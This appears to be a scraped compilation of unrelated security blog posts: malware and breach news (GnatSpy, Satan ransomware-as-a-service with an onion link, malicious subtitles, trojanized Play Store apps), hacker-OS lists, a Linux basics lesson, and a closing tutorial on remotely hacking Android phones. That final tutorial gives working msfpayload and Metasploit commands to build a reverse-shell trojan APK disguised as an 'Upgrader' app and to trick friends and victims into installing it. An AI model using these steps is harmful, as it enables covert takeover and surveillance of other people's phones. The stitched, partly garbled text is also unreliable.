New “GnatSpy” Mobile Malware Stealing data Such as Images, Text messages, Contacts, and Call History

A newly emerging mobile malware GnatSpy capable of abusing infected mobile and stealing various type of data such Images, Text messages, Contacts, and Call History.
GnatSpy is a new variant of VAMP which is dangerous Google Android malware family that mainly targeting mobiles to stealing sensitive data.

Many of old VAMP command and control server has been reused by the GnatSpy malware and it openly indicates that these attackers are connected.
This malware family detected as ANDROIDOS_GNATSPY. since distribution actor has not cleared identified, though researchers believe that threat actors sent them directly to users to download and install on their devices.
GnatSpy mobile malware mimics as “Android Setting” or “Facebook Update” to make users believe they were legitimate.

VAMP is an earlier version of this GnatSpy and its behavior altered by Gnatspy mobile malware and adding some sophisticated future later it spreading across to specific targeted groups or individuals.

GnatSpy Mobile Malware Improved capabilities and Working Function

some of the futures are very similar to VAMP variant but it newly evolved with some sophisticated threat actor and behavior.
GnatSpy’s app structure has completely improved and More receivers and services have been added by this malware author and researchers believe that malware author is sound knowledge of software design practices.


  
Old and new receivers and services
To perform an evasion technique to avoid detection, this malware using Java annotations and reflection methods.
Earlier versions of VAMP contained the C&C server used in a simple plain text, making detection by static analysis tools easier..but new variant using hardcoded in the malicious app’s code.

                                                         Hardcoded C&C Server

Here, hardcoded URL  malware is not the final C&C server but it again sends back to the original location of the actual C&C server.

Request and response pair for C&C server

In this case, many of GnatSpy used servers are a newly registered server. and registered person names appear to have been directly taken from various television shows.

An earlier version of this malware makes System Manager on Huawei devices to grant permissions to itself and similarly, Xiaomi devices also granted permission.
But the new version has spread with highly sophisticated techniques and it targets including several function calls targeting newer Android versions (Marshmallow and Nougat).

Code for Marshmallow and Nougat Android versions

“More information about the device is stolen as well, including information about the battery, memory and storage usage, and SIM card status. Curiously, while previous samples collected information about the user’s location via OpenCellID, this is no longer done by GnatSpy.” Trend Micro said.

“Ransomware as a Service” Provide SATAN Ransomware in Dark web to Make Money

 

Security researcher Xylitol Discovered a new Ransomware as a Service, or RaaS, called Satan.This administration permits any wannabe criminal to enroll a record and make their own one of a kind tweaked variant of the Satan Ransomware.
Once the ransomware is made, it is then up to the criminal to decide how they will disperse the ransomware, while the RaaS will handle the payoff installments and including new components.
Dark web Link :” http://satan6dll23napb5.onion “

For this administration, the RaaS designer takes a 30% cut of any installments that are made by casualties. As indicated by the ad for the Satan RaaS, the designer will diminish their cut contingent upon the volume of installments got by a partner.
It’s all very business as usual, apparently, with the Satan RaaS system going as far as to offer record-keeping functionality like fee payment records and transaction tracking.
Satan RaaS customers even have access to customer-relationship management (CRM) features like the ability to attach notes to victim records, and technical support in the way training and instructions.

Satan RaaS customers agree to pay its developers up to 30 percent of the “revenues” generated from ransom payments. According to the Satan sign-up page, “Now, the most important part: the bitcoin paid by the victim will be credited to your account. We will keep a 30 percent fee of the income,
so, if you specified a 1 BTC ransom, you will get 0.7 BTC and we will get 0.3 BTC. The fee will become lower depending on the number of infections and payments you have.”

The Satan RaaS

When a person first goes to the Satan RaaS they will be greeted with a home page that describes what the service is and how a criminal can make money with it.
Once a user registers an account and logs in, they will be greeted with an affiliate console that contains various pages that they can use to help distribute their ransomware.

These pages are the Malwares, Droppers, Translate, Account, Notices, and Messages pages.
The first page that is shown when someone logs in is the Malwares page, which allows a criminal to configure various settings of their very customized version of the Satan Ransomware. In terms of customization, there is not really many options.
A user can specify the ransom amount, how much it goes up after a certain amount of the days, and the amount of days that the ransom payment should increase.
The Satan platform contains a number of other features including fee payment records, transaction tracking, Satan version releases, and dropper creation.
Users can also create “notes” related to their victims, learn about how to set up gateway proxies, and are given instructions on how to test their malware on a physical machine.
Lastly, Satan’s creators warn users not to upload their malware to VirusTotal or other online scanners — as doing so will give white-hat researchers the code sample required to update and protect Windows machines from the threat.

 

320,000 Financial Records Apparently Stolen From Payment Processor,leaked online

More than 320,000 financial records have been leaked, and while the information appears to have been stolen either from payment processor BlueSnap or its customer Regpack, neither of them admit suffering a data breach.
BlueSnap is a payment payment which allows websites to take payments from customers by offering merchant facilities, whereas RegPack is a global online enrollment platform that uses BlueSnap to process the financial transactions for its online enrollments.

Australian security expert Troy Hunt, the owner of the Have I Been Pwned breach notification service, has analyzed the data and, after reaching out to some of the impacted individuals, he determined that the leaked records are most likely genuine. The compromised information includes names, physical addresses, email addresses, IP addresses, phone numbers, invoices containing purchase details, the last four digits of credit card numbers, and even CVV codes.


As Hunt has highlighted, despite the fact that full card data has not been leaked, the compromised information is still highly valuable for cybercriminals, particularly the CVVs, which can be used to conduct card-not-present transactions, and the last four digits of credit cards, which is considered identity verification data and which can be very useful for social engineering attacks.
Although the payment data does not contain full credit card numbers, as Hunt stressed, cyber criminals can still misuse the compromised information, particularly the CVV codes that are highly valuable payment data, which can be used to conduct “card not present” transactions.

Also, the last four digit of any user’s credit card number can also be used for identity verification that’s very useful in conducting social engineering attacks.
Hunt contacted BlueSnap as well as Regpack, but they both denied suffering a data breach. He has also loaded as many as 105,000 email addresses into Have I Been Pwned, so you can search for your address on the site to check whether you are impacted by the breach.

200 Million Downloaded video players including VLC Player are vulnerable to Malicious subtitles Attack -A Complete Takeover Attack

 

A new Cyber Attack Spreading through Vulnerable Subtitles which Downloaded by  Victims Media Player and threatens more than 200 Millions of vulnerable Machine in worldwide which leads to  complete take over to the infected machine .
This cyber attack is delivered when movie subtitles are loaded by the user’s media player which is  delivering by tricks victims.

Attackers  used two Major Attack Vectors to spreading crafting malicious subtitle files into Victims Media Player.

1. Attackers Forced victims to Visit Malicious Website to Download Subtitles
2. Tricks victims   into running a malicious file on his computer.

Vulnerable  Media Players are wildly used Media players including VLC, Kodi, Popcorn Time and Stremio.
Currently this Malicious subtitles repositories are Treated as Trusted Source by the Vulnerable Media Players.


According  to Checkpoint Researchers, This method requires little or no deliberate action on the part of the user, making it all the more dangerous.
Also Researchers Said,Unlike traditional attack vectors, which security firms and users are widely aware of, movie subtitles are perceived as nothing more than benign text files. This means users, Anti-Virus software, and other security solutions vet them without trying to assess their real nature, leaving millions of users exposed to this risk.

 Attack Vector used for Spreading

Many websites are serving Subtitles to Download and import into Media Players which is the potential Attack method to easily spread this Malicious Subtitles links.
Checkpoint Researchers  Revealed ,manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction.

 

Infect into IOT Devices

This Critical subtitles Attack may perform into PC, a smart TV, devices which infected by this Malicious Subtitles .

infected Media Players VLC has over 170 million downloads of its latest version alone, which was released June 5, 2016. Kodi (XBMC) has reached over 10 million unique users per day, and nearly 40 million unique users each month.
This Attack will leads to stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more. Checkpoint said.

Proof Of Concepts Video:

Here Checkpoint Submitted a Proof of Concepts for Complete take over  of the the Victims  Machine by the attacker via the infected media Players.
Once Malicious Subtitles loaded into the Victims Media Player ,then it will execute the Remote code and take over the entire Victims Machine.

2 Million Android Users Infected by Malicious Google Play Store Apps

2 Million Android Users Infected by Malicious Google Play Store Apps

A several Trojanized Malicious Google Play Store Apps have been discovered from different play store applications category that infected more than 2 Million Android users around the world.
Trojan Name as Android.RemoteCode.106.origin which is spreading via 9 Play store Apps which have been downloaded by at least 2,370,000 users and up to more than 11,700,000 users.

Nowadays Trojanized Android apps are increasing rapidly in the play store that always targets the innocent users who all are unaware of the malicious application and apps permission while installing the apps on their devices.

  

Some of Malicious Apps

Few days before New Android Malware called “Grabos”  Found in 144 Google Play apps that have been infected around 17.4 Million Android users.
These Trojanized applications are mainly used for increasing the website Traffic, installing the spyware, Performing phishing Attack and steal the confidential information.

How Does this Malicious Google Play Store Apps Works

Initially, it performs a number of Checks in users device once the Trojan gets into the victims mobile.

Ex Requirement:

• At least 10 photos;
• At least 3 entries in the phone log for the last three days;
• At least 10 contacts with a phone number.

Trojan has a specific condition that is used to performing the malicious activities on the infected devices. once the conditions are met then it sends a specific request to Command and Control Server and it will following the instructions that have given by the Controller of the Malware.
One of the Trojan (Android.Click.200.origin) among these infected application Performing some automatic function that opens web browsers and specific website that has been given by the command and control server to generate a web Traffic.
Also, it’s open a phishing URL that will lead to steal the user information or download some more dangerous malware such as ransomware and spyware.
Later another one dubbed Trojan Android.Click.199.origin, ensures the operation of the third component and main task of Android.Click.199.origin is to download, launch, and update Android.Click.201.origin.



Finally Android.Click.201.origin will again communicate with command and control server and open in invisible mode in Web View that receives a specific address which leads to clicks on the advertising banner indicated in the command or on an arbitrary element of the opened page.
the main purpose of Android.RemoteCode.106.origin is to download and launch additional malicious modules used to inflate website traffic stats, and also to follow advertising links. These actions bring cybercriminals a profit. In addition, the malicious program can be used to perform phishing attacks and steal confidential information.Dr.Web Said.

Trojanized Apps List

• Sweet Bakery Match 3 – Swap and Connect 3 Cakes 3.0;
• Bible Trivia, version 1.8;
• Bible Trivia – FREE, version 2.4;
• Fast Cleaner light, version 1.0;
• Make Money 1.9;
• Band Game: Piano, Guitar, Drum, version 1.47;
• Cartoon Racoon Match 3 – Robbery Gem Puzzle 2017, version 1.0.2;
• Easy Backup & Restore, version 4.9.15;
• Learn to Sing, version 1.2.

 

Parrot Security OS 3.10 Released with New Powerful Hacking Tools

 

Parrot Security OS 3.10  is a Penetration Testing & Forensics Distro dedicated to Ethical Hackers & Cyber Security Professionals.
With the new release 3.10, it includes some important new features to make the system more secure and reliable.

The first big news is the introduction of a full firejail+apparmor sandboxing system to proactively protect the OS by isolating its components with the combination of different techniques which already has been released in 3.9 version.
The new version of Parrot Security OS 3.10 comes with Linux Kernel 4.14 LTS, awesome features of this new kernel release, as well as the Mozilla Firefox Quantum (57.0).
Also Parrot included a todo list and planner program, a personal finance management suite and a mind map designer.

So new parrot OS Shipped with new ISO files which include having seen many improvements, bug-fixes and security updates.
This version including some lightweight but useful programs for daily tasks for our users who have a parrot as their main system.
Use the Following command in terminal To upgrade the system and get new version 3.10
The program is certified to run on systems that have at least 265Mb of RAM and is suitable for both 32bit (i386) and 64bit (amd64).

It also has a special version running on old 32bit (486) machines. In addition, the program is available for armel and armhf architectures. It also has a version (32bit and 64bit) developed for servers to perform Cloud pentesting and Future versions of parrot would probably include a new user friendly installer too.

Download Links for Parrot Security OS 3.10 Released 

• Parrot-home-3.10_amd64.iso
• Parrot-home-3.10_amd64.iso.hashes
• Parrot-home-3.10_amd64.iso.torrent
• Parrot-home-3.10_i386.iso
• Parrot-home-3.10_i386.iso.hashes
• Parrot-home-3.10_i386.iso.torrent
• Parrot-security-3.10_amd64.iso
• Parrot-security-3.10_amd64.iso.hashes
• Parrot-security-3.10_amd64.iso.torrent
• Parrot-security-3.10_i386.iso
• Parrot-security-3.10_i386.iso.hashes
• Parrot-security-3.10_i386.iso.torrent
• signed-hashes.txt

Top 10 OS used by hackers 2017-2018

by The Ananymous - December 02, 2017

          TOP 10 OS USED BY HACKERS

              Thinking of which is the best operating system for ethical hacking and penetration purposes? So, you reached your destiny, Alwayshackers has prepared a list of the most efficient operating systems for hacking purposes that you need to know in 2017. This list includes top 10 operating systems like Kali Linux, Parrot Security OS, BlackArch, etc. 

We are not going to include Windows operating systems are they are not mostly used for hacking purposes.

Without any delay Let's get started from bottom to top:

10.Cyborg Hawk Linux

        CYBORG HAWK LINUX is an Ubuntu-based Penetration Testing OS created by the team of Ztrela Knowledge Solutions Pvt. Ltd. which is designed for ethical hackers

and cybersecurity officers it is one of the most advanced operating systems. It has overall 1000+ tools for network security and digital forensics. In this tools over 350 tools can be used for mobile security purposes and malware detection.Definitely, it is one of the Top 10 Operating systems for Hackers.

9.Blackbuntu

          Blackbuntu is the operating system for beginners and practitioners but this OS is mostly not used hackers or so but it is the perfect platform for beginners. It is being developed by Ubuntu. It is user-friendly and easily understandable this is the reason why it is used for training cybersecurity students. Moreover, it is designed with GNOME desktop environment.

8.Bugtrack

Kenzaburo Ito started development of the Mantis Bug Tracking project in 2000. Bugtrack, the name itself gives us some idea it usually runs as an electronic mailing list to detect bugs in our computer system. It helps in fixing issues regarding almost all vulnerabilities. Usually, bugtrack developers are very experienced and they always keep things updated It is available in Debian, Ubuntu, and OpenSUSE

7.Gnacktrack

It is also an "operating system" which is available for free anybody can use it openly.It has penetration testing tools which are very much effective and useful. It has the right to come under TOP 10 operating systems. it is an Ubuntu-based operating system but nowadays its demand is gradually decreasing as Kali Linux is evolving

6.BlackArch

BlackArch Linux -an Arch Linux-based penetration testing distribution for penetration testers and security researchers.It is the lightweight expansion to Arch Linux for penetration testers

It is considered to be must have operating system for Hackers.It has a bunch of over 1500 tools which makes it so popular and efficient to use.

5.Network Security Toolkit

      Network Security Toolkit (NST) is a Linux-based Live DVD/USB Flash Drive that provides a set of free and open-source security and networking tools.It is an analysis and validation tool which can be used on enterprise virtual servers and host virtual machines.Including this, there are many other features in this such as Network Security Toolkit (NST) is a Linux-based Live DVD/USB Flash Drive that provides a set of free and open-source computer security and networking tools.

4.DEFT Linux

It was created by Stefano Fratepietro for uses related to Computer Forensics DEFT stands for Digital Evidence and Forensic Toolkit it is based on Ubuntu operating system and it is an open source distribution of Linux.DEFT is an operating system which uses RAM for its operation.There are many tools which can be used by authorities.

3.BackBox

      BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatics systems analysis toolkit.It contains more than 70 useful tools. It also includes some of the most used security and analysis Linux tools, aiming for a wide spread of goals, ranging from web application analysis to network analysis, from stress tests to sniffing, also including vulnerability assessment, computer forensic analysis, and exploitation.The main aim of BackBox is providing an alternative, highly customizable and well-performing system.

2.Parrot Security OS

Parrot Security OS is a Linux distribution based on Debian with a focus on computer security. It is designed for penetration testing, vulnerability assessment and mitigation, computer forensics and anonymous web browsing. It is developed by the Frozen box Team.

The desktop environment is MATE, and the default display manager is LightDM.As Kali Linux Parrot Os is also most frequently used operating system by hackers.Parrot Security OS is intended to provide penetrating testing tools equipped with many different kinds of tools for the user to be tested in their lab.

1.Kali Linux

               And Finally, there comes the king of all hacking operating system of all time.Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns, and Raphaël Hertzog are the core developers.Kali Linux has over 600 preinstalled penetration-testing programs.It has almost all the tools which are available that is why it is called as the hacker's paradise.It is also available on the Android platform.

So, by all the information you can judge which one is better.what I shared is based is on my view if you think there are any other which is better which I forgot to share than you can freely comment below and share your ideas.

Always Fact :
                     There are total 611 operating system available and 656 Linux  Distributions available ohhh too many..............!

Thank You,

Follow us to get amazing articles about hacking tutorials

 

https://www.facebook.com/pg/blackhathacking123/posts/?ref=page_internal

Linux Basics for the Aspiring Hacker

Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)

Welcome back, my hacker trainees!
A number of you have written me regarding which operating system is best for hacking. I'll start by saying that nearly every professional and expert hacker uses Linux or Unix. Although some hacks can be done with Windows and Mac OS, nearly all of the hacking tools are developed specifically for Linux.

There are some exceptions, though, including software like Cain and Abel, Havij, Zenmap, and Metasploit that are developed or ported for Windows.
When these Linux apps are developed in Linux and then ported over to Windows, they often lose some of their capabilities. In addition, there are capabilities built into Linux that simply are not available in Windows. That is why hacker tools are in most cases ONLY developed for Linux.
To summarize, to be a real expert hacker, you should master a few Linux skills and work from a Linux distribution like BackTrack or Kali.

Image via wonderhowto.com

For those of you who've never used Linux, I dedicate this series on the basics of Linux with an emphasis on the skills you need for hacking. So, let's open up BackTrack or your other Linux distribution and let me show you a few things.

Step 1Boot Up Linux

Once you've booted up BackTrack, logged in as "root" and then type:

• bt > startx

You should have a screen that looks similar to this.

Step 2Open a Terminal

To become proficient in Linux, you MUST master the terminal. Many things can be done now in the various Linux distributions by simply pointing and clicking, similar to Windows or Mac OS, but the expert hacker must know how to use the terminal to run most of the hacking tools.
So, let's open a terminal by clicking on the terminal icon on the bottom bar. That should give us a screen that looks similar to this.

If you've ever used the command prompt in Windows, the Linux terminal is similar, but far more powerful. Unlike the Windows command prompt, you can do EVERYTHING in Linux from the terminal and control it more precisely than in Windows.

It's important to keep in mind that unlike Windows, Linux is case-sensitive. This means that "Desktop" is different from "desktop" which is different from "DeskTop". Those who are new to Linux often find this challenging, so try to keep this in mind.

Step 3Examine the Directory Structure

Let's start with some basic Linux. Many beginners get tripped up by the structure of the file system in Linux. Unlike Windows, Linux's file system is not linked to a physical drive like in Windows, so we don't have a c:\ at the beginning of our Linux file system, but rather a /.
The forward slash (/) represents the "root" of the file system or the very top of the file system. All other directories (folders) are beneath this directory just like folders and sub-folders are beneath the c:\ drive.

To visualize the file system, let's take a look at this diagram below.

It's important to have a basic understanding of this file structure because often we need to navigate through it from the terminal without the use of a graphical tool like Windows Explorer.
A couple key things to note in this graphical representation:

• The /bin directory is where binaries are stored. These are the programs that make Linux run.
• /etc is generally where the configuration files are stored. In Linux, nearly everything is configured with a text file that is stored under /etc.
• /dev directory holds device files, similar to Windows device drivers.
• /var is generally where log files, among other files, are stored.

Step 4Using Pwd

When we open a terminal in BackTrack, the default directory we're in is our "home" directory. As you can see from the graphic above, it's to the right of the "root" directory or one level "below" root. We can confirm what directory we are in by typing:

• bt > pwd

pwd stands for "present working directory" and as you can see, it returns "/root" meaning we're in the root users directory (don't confuse this with the top of the directory tree "root." This is the root users directory).

pwd is a handy command to remember as we can use it any time to tell us where we are in the directory tree.

Step 5Using Cd Command

We can change the directory we're working in by using the cd (change directory) command. In this case, let's navigate "up" to the top of the directory structure by typing:

• bt > cd ..

The cd command followed by the double dots (..) says, "move me up one level in the directory tree." Notice that our command prompt has changed and when we type pwd we see that Linux responds by telling us we are in the "/" or the top of the directory tree (or the root directory).

• bt > pwd

Step 6Using the Whoami Command

In our last lesson of this tutorial, we'll use the whoami command. This command will return the name of the user we're logged in as. Since we're the root user, we can log in to any user account and that user's name would be displayed here.

• bt > whoami

That's it for now. In the next several tutorials, I will continue to give you the basics of Linux that you'll need to be a pro hacker, so keep coming back!

https://www.youtube.com/watch?v=0hrRevHi1Hg

 

Hack Android Using Kali (Remotely) 

 

Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.

1.0 Fire-Up Kali:

• Open a terminal, and make a Trojan .apk
• You can do this by typing :
• msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
• You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

2.0 Open Another Terminal:

• Open another terminal until the file is being produced.
• Load metasploit console, by typing : msfconsole

3.0 Set-Up a Listener:

• After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler

• Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
• To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

4.0 Exploit!

• At last type: exploit to start the listener.
• Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.

• Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
• Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)

• Let the Victim install the Up grader app(as he would think it is meant to upgrade some features on his phone)
• However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
• And when he clicks Open...

• Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
• However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
• And when he clicks Open...

5.0 BOOM!

There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.

like our official facebok page this like post...

https://www.facebook.com/blackhathacking123/